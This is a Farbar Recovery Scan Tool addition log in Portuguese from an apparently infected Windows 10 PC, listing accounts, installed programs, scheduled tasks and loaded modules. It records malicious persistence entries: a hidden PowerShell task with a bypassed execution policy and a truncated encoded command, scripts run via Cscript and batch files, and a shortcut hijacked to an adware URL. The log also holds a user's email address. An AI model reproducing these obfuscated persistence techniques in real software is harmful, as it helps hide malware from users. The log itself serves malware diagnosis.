Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:05-03-2016 01
Executado por David (2016-04-03 15:04:49)
Executando a partir de C:\Users\David\Desktop
Windows 10 Pro Versão 1511 (X64) (2015-11-27 22:56:42)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-3348681765-1422920454-2627347377-500 - Administrator - Disabled)
Convidado (S-1-5-21-3348681765-1422920454-2627347377-501 - Limited - Disabled)
David (S-1-5-21-3348681765-1422920454-2627347377-1001 - Administrator - Enabled) => C:\Users\David
DefaultAccount (S-1-5-21-3348681765-1422920454-2627347377-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3348681765-1422920454-2627347377-1003 - Limited - Enabled)
migue_000 (S-1-5-21-3348681765-1422920454-2627347377-1004 - Administrator - Enabled) => C:\Users\migue_000

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Baidu Antivirus (Enabled - Up to date) {0B023102-4312-4570-585A-1BAAA3570E16}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Baidu Antivirus (Enabled - Up to date) {B063D0E6-6528-4AFE-62EA-20D8D8D044AB}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-3348681765-1422920454-2627347377-1001\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Atualizações da NVIDIA 2.4.3.22 (Version: 2.4.3.22 - NVIDIA Corporation) Hidden
Baidu Antivirus (HKLM-x32\...\Baidu Antivirus) (Version: 5.4.3.147185 - Baidu, Inc.)
Baidu Browser (HKLM-x32\...\Spark) (Version: 40.16 Preview - Baidu Inc.)
Blender (HKLM\...\Blender) (Version: 2.69 - Blender Foundation)
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ATENÇÃO
CCleaner (HKLM\...\CCleaner) (Version: 4.10 - Piriform)
Cities: Skylines (HKLM\...\Steam App 255710) (Version:  - Colossal Order Ltd.)
Counter-Strike 1.6 (HKLM-x32\...\Counter-Strike 1.6) (Version:  - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 5.0.1.0406 - Disc Soft Ltd)
DVDStyler v2.9.3 (HKLM-x32\...\DVDStyler_is1) (Version:  - )
Epic Games Launcher (HKLM-x32\...\{9002F83C-DA49-411E-9CF0-111CB3979F9C}) (Version: 1.1.50.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Firewatch (HKLM-x32\...\Firewatch_is1) (Version:  - )
FormatFactory 3.7.0.0 (HKLM-x32\...\FormatFactory) (Version: 3.7.0.0 - Format Factory)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\{579BA58C-F33D-4970-9953-B94B43768AC3}) (Version: 1.00.0000 - Rockstar Games)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
GTA IV em Português BR (HKLM-x32\...\GTA IV em Português BR1.0) (Version: 1.0 - Afrânio Bezerra de Souza)
GTA IV Vehicle Mod Installer v1.3 (HKLM-x32\...\GTA IV Vehicle Mod Installer v1.3_is1) (Version:  - MobileD2)
Half-Life (HKLM-x32\...\Half-Life_is1) (Version: Half-Life - Non Steam - KingSOFT DVD)
Intel Driver Update Utility (HKLM-x32\...\{fe92d390-13ee-4660-a2f8-39a066fdffe0}) (Version: 2.2.0.5 - Intel)
Intel(R) Driver Update Utility 2.2.0.5 (x32 Version: 2.2.0.1 - Intel) Hidden
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
Kingo ROOT version 1.4.3.2539 (HKLM-x32\...\{AE7675D6-0B31-494F-ABFA-822E1A0FDF17}_is1) (Version: 1.4.3.2539 - Kingosoft Technology Ltd.)
L.A. Noire (HKLM\...\Steam App 110800) (Version:  - Team Bondi)
Launcher Prerequisites (x64) (x32 Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version:  - DONTNOD Entertainment)
Max Payne 3 (HKLM\...\Steam App 204100) (Version:  - Rockstar Studios)
Max Remote versão 2.3 (HKLM-x32\...\{996228C5-A910-42C1-80E3-1E47CEDF7E18}_is1) (Version: 2.3 - Bit Units Studio)
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{070C55FA-FB9D-46DD-B30B-4B520A83A66A}) (Version: 1.20.146.0 - Microsoft)
Minecraft Story Mode   Episode 3 (HKLM-x32\...\Minecraft Story Mode   Episode 3_is1) (Version:  - )
Minecraft Story Mode Episode 2 (HKLM-x32\...\Minecraft Story Mode Episode 2_is1) (Version:  - )
Minecraft: Story Mode - A Telltale Games Series (HKLM\...\bWluZWNyYWZ0c3Rvcnltb2RlYXRlbGx0YWxlZ2FtZXNzZXJpZXM_is1) (Version: 1 - )
Minecraft: Story Mode - A Telltale Games Series (HKLM\...\TWluZWNyYWZ0U3RvcnlNb2RlQVRlbGx0YWxlR2FtZXNTZXJpZXM=_is1) (Version: 1 - )
MTA:SA v1.5.2 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.2 - Multi Theft Auto)
NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst (HKLM-x32\...\NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst_is1) (Version:  - Namco Bandai Games)
NARUTO SHIPPUDEN: Ultimate Ninja STORM 4 (HKLM-x32\...\Steam App 349040) (Version:  - CyberConnect2 Co. Ltd.)
Need for Speed Underground 2 (HKLM-x32\...\{909F8EBC-EC7F-48FF-0085-475D818F0F31}) (Version:  - )
NVIDIA Driver de áudio HD 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA Driver de controle do 3D Vision 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA Driver de gráficos 353.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 353.54 - NVIDIA Corporation)
NVIDIA Driver do 3D Vision 353.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 353.54 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.3.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.3.22 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.15.0324 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0324 - NVIDIA Corporation)
OpenIV (HKU\S-1-5-21-3348681765-1422920454-2627347377-1001\...\OpenIV) (Version: 2.7.680 - .black/OpenIV Team)
Painel de controle da NVIDIA 353.54 (Version: 353.54 - NVIDIA Corporation) Hidden
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version:  - )
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2-r5875) (Version:  - )
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PokerStars (HKLM-x32\...\PokerStars) (Version:  - PokerStars)
PS3 Media Server (HKLM-x32\...\PS3 Media Server) (Version: 1.90.1 - PS3 Media Server)
Remote Desktop Access (VuuPC) (HKLM-x32\...\VOPackage) (Version:  - CMI Limited) <==== ATENÇÃO
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.7.2 - Rockstar Games)
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.3.16011.2 - Samsung Electronics Co., Ltd.)
Samsung Kies (x32 Version: 2.6.3.16011.2 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.15.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Comma (HKLM-x32\...\SoftwareUpdater) (Version: 1.0.0.0 - Satellite Comma) <==== ATENÇÃO
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version:  - ) <==== ATENÇÃO
SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.3.22 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{D87EE6DC-32BA-4219-AC75-0A6FD54ED058}) (Version: 16.0.19912 - Trimble Navigation Limited)
Software de dispositivo do Chipset Intel® (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.29 - Piriform)
Sprite Lamp Demo (HKLM-x32\...\Steam App 318820) (Version:  - Snake Hill Games)
SpriteIlluminator (HKLM\...\{63DA7C2B-6FD4-4140-BA80-A8E2B2675DC5}) (Version: 1.2.2 - code-and-web.de)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sunset Riders (HKLM-x32\...\Sunset Riders_is1) (Version:  - GameFabrique)
Super Mario Bros. X (HKLM-x32\...\Super Mario Bros. X) (Version:  - )
The Walking Dead (HKLM-x32\...\Steam App 207610) (Version:  - )
The Walking Dead: Season Two (HKLM-x32\...\Steam App 261030) (Version:  - Telltale Games)
Tools Update Platform (HKLM-x32\...\{6A128791-4857-4484-9BB2-71D4C1257200}) (Version: 5.0.0.61 - Beijing Zhihuimen Techology co,.Ltd) <==== ATENÇÃO
Toolwiz Care (HKLM-x32\...\ToolwizCareFree) (Version: 3.1.0.5000 - ToolWiz Care)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Xander - Files 1.00 (HKLM-x32\...\Xander - Files 1.00) (Version:  - )

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-3348681765-1422920454-2627347377-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\David\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3348681765-1422920454-2627347377-1001_Classes\CLSID\{D45F043D-F17F-4e8a-8435-70971D9FA46D}\InprocServer32 -> C:\Program Files (x86)\Blender Foundation\Blender\BlendThumb64.dll ()

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {00EFB637-03DE-43A8-94D3-4030D0433886} - System32\Tasks\DNSPEACHBURG => dnspeachburg.exe <==== ATENÇÃO
Task: {0F1F8A04-8387-4482-90B6-030DF52032E5} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Duplicaterecord.js" <==== ATENÇÃO
Task: {1403B665-624A-4372-B6E1-9637D1CD3B6F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {166BA55F-9F8E-409F-9EEC-F6AF32625ED4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {24E12B06-C447-47E6-AE68-920DB0DD1C7D} - System32\Tasks\SparkUpdater => C:\Program Files (x86)\baidu\Baidu Browser\SparkUpdate.exe [2016-03-04] (Baidu.com, Inc.)
Task: {2A424AF1-4CCC-4A9E-80F7-693FDFE4ED63} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {2B0D7ACC-7BBC-4278-B4A4-65A56939823B} - System32\Tasks\{79790447-7D0F-0A08-0C11-7D0D7A7E117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (a entrada de dados tem 9280 mais caracteres).
Task: {3544628D-693D-4141-A7B5-994353A0498C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-13] (Google Inc.)
Task: {3B96A041-0DDB-471F-A477-8AF9E4C5CE04} - System32\Tasks\ToolsUpdatePlatform_ScheduledTask => C:\Program Files (x86)\ToolsUpdatePlatform\UpdatePlatform.exe <==== ATENÇÃO
Task: {5442E088-C191-42D7-BA5E-41D1EA5642E4} - System32\Tasks\Tegtigmh => C:\PROGRA~1\SHOPPE~1\Laqmusxu.bat
Task: {594EC3C1-E3CD-464F-89C5-C1639112CCE7} - System32\Tasks\{180AEC9F-C978-4740-B45E-4B4BC72D5A93} => pcalua.exe -a C:\Users\David\Desktop\toolwiz-care-3-1-0-5300-es-en-br-fr-de-it-cn-jp-ar-ru-pl-gr-kr-se-win.exe -d C:\Users\David\Desktop
Task: {5A54E578-238E-4DC1-B31F-5517FBE402F7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {64E8DEF2-6BB9-402F-8F3D-EC6493344253} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {6A713C69-CD64-4E4B-8542-6B130D940B1C} - System32\Tasks\Lunfur => C:\PROGRA~1\Momthen\Roecgom.bat
Task: {76378DD5-7AF9-4552-B986-AB47FD1FFEE9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-13] (Google Inc.)
Task: {7647EBFB-7BD9-4DD6-934C-66702154CEDD} - System32\Tasks\Baidu Antivirus Update => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\BavUpdater.exe [2015-10-23] (Baidu, Inc.)
Task: {7770631E-46AD-4DBD-807E-D3F943B25334} - System32\Tasks\kze3024 => C:\Program Files (x86)\Hoistsearch\kze3024.exe <==== ATENÇÃO
Task: {7CD91555-047A-49D9-AEE3-5B7133B434E7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {7E28388B-EB1E-4BFB-AC27-7EB40F2762D4} - System32\Tasks\USER_ESRV_SVC_WILLAMETTE => Wscript.exe //B //NoLogo "C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\task.vbs"
Task: {86EB45A8-8E96-4AF5-9D08-7786C484BAA8} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {899283C1-4DE7-46F3-9D4B-BC9DA26E0820} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {921A4523-2466-49A5-B755-53301BF2B184} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-davipassos2012@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {9335495C-9CC7-4A86-B03E-8507F909BC9E} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe
Task: {A5D3C09B-5EEA-464E-8002-03777D49BBE3} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {A841E4FE-1439-4346-9F37-F97858A6757E} - System32\Tasks\{110A5FD8-79B9-40CF-959F-3A991F668EAD} => pcalua.exe -a C:\Users\David\Desktop\Xbox360_64Ptb.exe -d C:\Users\David\Desktop
Task: {AD210E43-65B3-49A1-961F-50B61AE51E9B} - System32\Tasks\{DFB5A549-525C-4D5F-A279-0D88614A70DF} => pcalua.exe -a "C:\Program Files (x86)\PC Faster\Uninstall.exe"
Task: {BB96C590-D053-4465-ABD4-1221BB78AAA1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {D369611B-87F5-4A28-8A00-DF9FC5F2BE4C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {D4449921-8F37-4738-9FC8-BA5CBAE5C294} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-03-31] ()
Task: {E1E17AAF-284D-45E6-A371-248093FDAB45} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {E5649ED9-AE27-4375-891D-B02EE89AD65B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-01-21] (Piriform Ltd)
Task: {EC7B9B19-5529-40B1-844C-E1761E0E1FC1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {EF8D9A00-A17E-4B52-9CD4-AB137714D588} - System32\Tasks\DNS Monitoring => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {FA16FDA1-678A-41D9-B669-3FB2EDF5887B} - System32\Tasks\{B30AE3A6-3FFD-4CAD-8291-7788A1362499} => pcalua.exe -a "C:\Users\David\Documents\MEGAsync Downloads\Xbox360_64Ptb.exe" -d "C:\Users\David\Documents\MEGAsync Downloads"
Task: {FB7182B6-2969-4BB9-82FE-032F3EA05FEC} - System32\Tasks\ToolwizCareFree => C:\Program Files (x86)\ToolwizCareFree\ToolwizCares.exe [2016-01-22] (Toolwiz)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\ToolsUpdatePlatform_ScheduledTask.job => C:\Program Files (x86)\ToolsUpdatePlatform\UpdatePlatform.exe <==== ATENÇÃO

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

ShortcutWithArgument: C:\Users\David\AppData\Local\Microsoft\Windows\FileHistory\Data\981\C\Users\David\Desktop\Jogos\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst.lnk -> C:\Program Files (x86)\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst\NS3FB_launcher.exe () -> hxxp://www.omniboxes.com/?type=sc&ts=1453004958&z=b4dc208553b81345bd8b0aag9zewdc9e1eez4t4w5b&from=amt&uid=samsungxhd250hj_s0urj9cpc27728

==================== Módulos Carregados (Whitelisted) ==============

2016-04-02 01:55 - 2016-04-02 01:55 - 03587000 _____ () C:\ProgramData\System32\SafeGuard64.dll
2015-10-31 12:46 - 2015-09-14 12:01 - 00414360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
2015-10-31 12:46 - 2015-09-14 12:07 - 00709272 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_modeler.dll
2015-10-31 12:46 - 2015-09-14 12:04 - 00130712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_process_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00025752 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_system_power_state_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00059544 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_quality_and_reliability_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00194712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\acpi_battery_input.dll
2015-10-31 12:46 - 2015-09-14 12:06 - 00159896 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\sema_thermal_input.dll
2015-10-31 12:46 - 2015-09-14 12:06 - 00158360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\wifi_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00050840 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\devices_use_input.dll
2015-10-31 12:46 - 2015-09-14 12:04 - 00032920 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_disktrace_input.dll
2015-10-30 04:18 - 2015-10-30 04:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-03-02 23:15 - 2016-02-23 08:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-02 23:15 - 2016-02-23 08:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-03-02 23:15 - 2015-12-07 01:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 23:16 - 2016-02-23 05:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-03-02 23:16 - 2016-01-04 22:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-03-02 23:15 - 2016-01-04 22:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-03-02 23:15 - 2016-01-16 02:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-03-02 23:16 - 2016-01-16 02:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-02 01:08 - 2016-03-31 16:28 - 02041856 _____ () C:\ProgramData\WindowsMsg\osmsg.exe
2016-01-28 00:01 - 2016-03-04 12:11 - 00983352 _____ () C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe
2015-10-23 22:20 - 2015-10-23 22:20 - 00297968 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\HipsLogger.dll
2015-10-23 22:20 - 2015-10-23 22:20 - 00540656 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\sqlite.dll
2016-04-02 01:55 - 2016-04-02 01:55 - 02771896 _____ () C:\ProgramData\System32\SafeGuard32.dll
2015-10-23 22:20 - 2015-05-27 08:10 - 00198128 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\dark.dll
2015-12-18 10:55 - 2015-12-18 10:55 - 00052224 _____ () C:\Users\David\AppData\Local\MEGAsync\cares.dll
2016-01-19 21:24 - 2016-01-19 21:24 - 00143872 _____ () C:\Users\David\AppData\Local\MEGAsync\libuv.dll
2015-10-23 22:20 - 2015-10-23 22:20 - 00277488 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\Pulgin_Dark_DeleteFileTip.dll
2015-10-23 22:20 - 2015-10-23 22:20 - 01117680 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\Operation.dll
2016-03-29 17:47 - 2016-03-04 15:51 - 00096768 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\chrome_elf.dll
2016-04-02 01:57 - 2016-03-04 15:51 - 00732160 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\chrome_elf_wk.dll
2016-03-29 17:47 - 2016-03-27 04:58 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-29 17:47 - 2016-03-27 04:58 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libegl.dll
2016-03-29 17:47 - 2016-03-27 04:58 - 17545880 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\PepperFlash\pepflashplayer.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00430904 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdminiopenssl.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 01018168 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdxui.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00219448 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdbrowsertray.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00410936 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdxctrl.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00521016 _____ () C:\Program Files (x86)\baidu\Baidu Browser\xnet.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00276792 _____ () C:\Program Files (x86)\baidu\Baidu Browser\p2squery.dll
